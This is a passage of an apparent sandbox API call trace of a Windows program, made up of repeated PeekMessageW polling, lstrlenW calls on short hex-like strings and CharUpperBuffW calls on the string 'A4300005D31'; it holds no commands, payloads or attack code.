wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0083.744] lstrlenW (lpString="20") returned 2 [0083.744] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0083.744] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0083.744] lstrlenW (lpString="31") returned 2 [0083.744] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0083.744] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0083.744] lstrlenW (lpString="20") returned 2 [0083.744] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0083.744] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0083.744] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0083.744] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0083.744] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0083.744] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0083.744] lstrlenW (lpString="20") returned 2 [0083.744] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0083.744] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0083.744] lstrlenW (lpString="31") returned 2 [0083.744] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0083.744] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0083.744] lstrlenW (lpString="20") returned 2 [0083.744] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0083.744] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0083.744] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0083.745] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0083.745] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0083.745] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0083.745] lstrlenW (lpString="5B") returned 2 [0083.745] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0083.745] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0083.745] lstrlenW (lpString="5C") returned 2 [0083.745] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0083.745] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0083.745] lstrlenW (lpString="5C") returned 2 [0083.745] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0083.745] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0083.745] lstrlenW (lpString="2F") returned 2 [0083.745] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0083.745] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0083.745] lstrlenW (lpString="3A") returned 2 [0083.745] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0083.745] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0083.745] lstrlenW (lpString="3E") returned 2 [0083.745] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0083.745] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0083.745] lstrlenW (lpString="3C") returned 2 [0083.745] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0083.745] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0083.748] lstrlenW (lpString="5C") returned 2 [0083.748] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0083.748] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0083.748] lstrlenW (lpString="7C") returned 2 [0083.748] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0083.748] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0083.748] lstrlenW (lpString="5D") returned 2 [0083.748] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0083.748] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0083.748] lstrlenW (lpString="7C") returned 2 [0083.748] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0083.748] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0083.748] lstrlenW (lpString="28") returned 2 [0083.748] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0083.748] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0083.748] lstrlenW (lpString="3F") returned 2 [0083.748] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0083.749] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0083.749] lstrlenW (lpString="73") returned 2 [0083.749] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0083.749] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0083.749] lstrlenW (lpString="29") returned 2 [0083.749] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0083.749] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0083.749] lstrlenW (lpString="5C") returned 2 [0083.749] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0083.749] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0083.749] lstrlenW (lpString="41") returned 2 [0083.749] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0083.749] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0083.749] lstrlenW (lpString="5C") returned 2 [0083.749] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0083.749] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0083.749] lstrlenW (lpString="73") returned 2 [0083.749] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0083.749] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0083.749] lstrlenW (lpString="2A") returned 2 [0083.749] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0083.749] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0083.749] lstrlenW (lpString="5C") returned 2 [0083.749] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0083.749] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0083.749] lstrlenW (lpString="7A") returned 2 [0083.749] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0083.749] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0083.749] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0083.750] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0083.750] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0083.750] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0083.750] lstrlenW (lpString="20") returned 2 [0083.750] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0083.750] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0083.750] lstrlenW (lpString="32") returned 2 [0083.750] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0083.750] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0083.750] lstrlenW (lpString="20") returned 2 [0083.750] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0083.750] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0083.750] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0083.750] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0083.750] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0083.750] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0083.750] lstrlenW (lpString="20") returned 2 [0083.750] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0083.750] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0083.750] lstrlenW (lpString="32") returned 2 [0083.750] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0083.750] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0083.750] lstrlenW (lpString="20") returned 2 [0083.750] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0083.750] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0083.750] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0083.750] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0083.751] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0083.751] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0083.751] lstrlenW (lpString="20") returned 2 [0083.751] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0083.751] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0083.751] lstrlenW (lpString="30") returned 2 [0083.751] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0083.751] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0083.751] lstrlenW (lpString="20") returned 2 [0083.751] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0083.751] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0083.751] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0083.751] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0083.751] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0083.751] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0083.751] lstrlenW (lpString="20") returned 2 [0083.751] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0083.751] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0083.751] lstrlenW (lpString="31") returned 2 [0083.751] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0083.751] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0083.751] lstrlenW (lpString="20") returned 2 [0083.751] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0083.751] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0083.751] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0083.751] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0083.751] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0083.752] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0083.752] lstrlenW (lpString="20") returned 2 [0083.752] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0083.752] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0083.752] lstrlenW (lpString="32") returned 2 [0083.752] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0083.752] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0083.752] lstrlenW (lpString="20") returned 2 [0083.752] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0083.752] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0083.752] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0083.752] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0083.752] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0083.752] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0083.752] lstrlenW (lpString="20") returned 2 [0083.752] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0083.752] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0083.752] lstrlenW (lpString="33") returned 2 [0083.752] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0083.752] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0083.752] lstrlenW (lpString="20") returned 2 [0083.752] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0083.752] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0083.752] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0083.752] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0083.752] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0083.752] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0083.752] lstrlenW (lpString="20") returned 2 [0083.753] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0083.753] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0083.753] lstrlenW (lpString="33") returned 2 [0083.753] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0083.753] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0083.753] lstrlenW (lpString="20") returned 2 [0083.753] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0083.753] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0083.753] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0083.753] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0083.753] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0083.753] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0083.753] lstrlenW (lpString="20") returned 2 [0083.753] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0083.753] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0083.753] lstrlenW (lpString="34") returned 2 [0083.753] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0083.753] PeekMessageW (in: 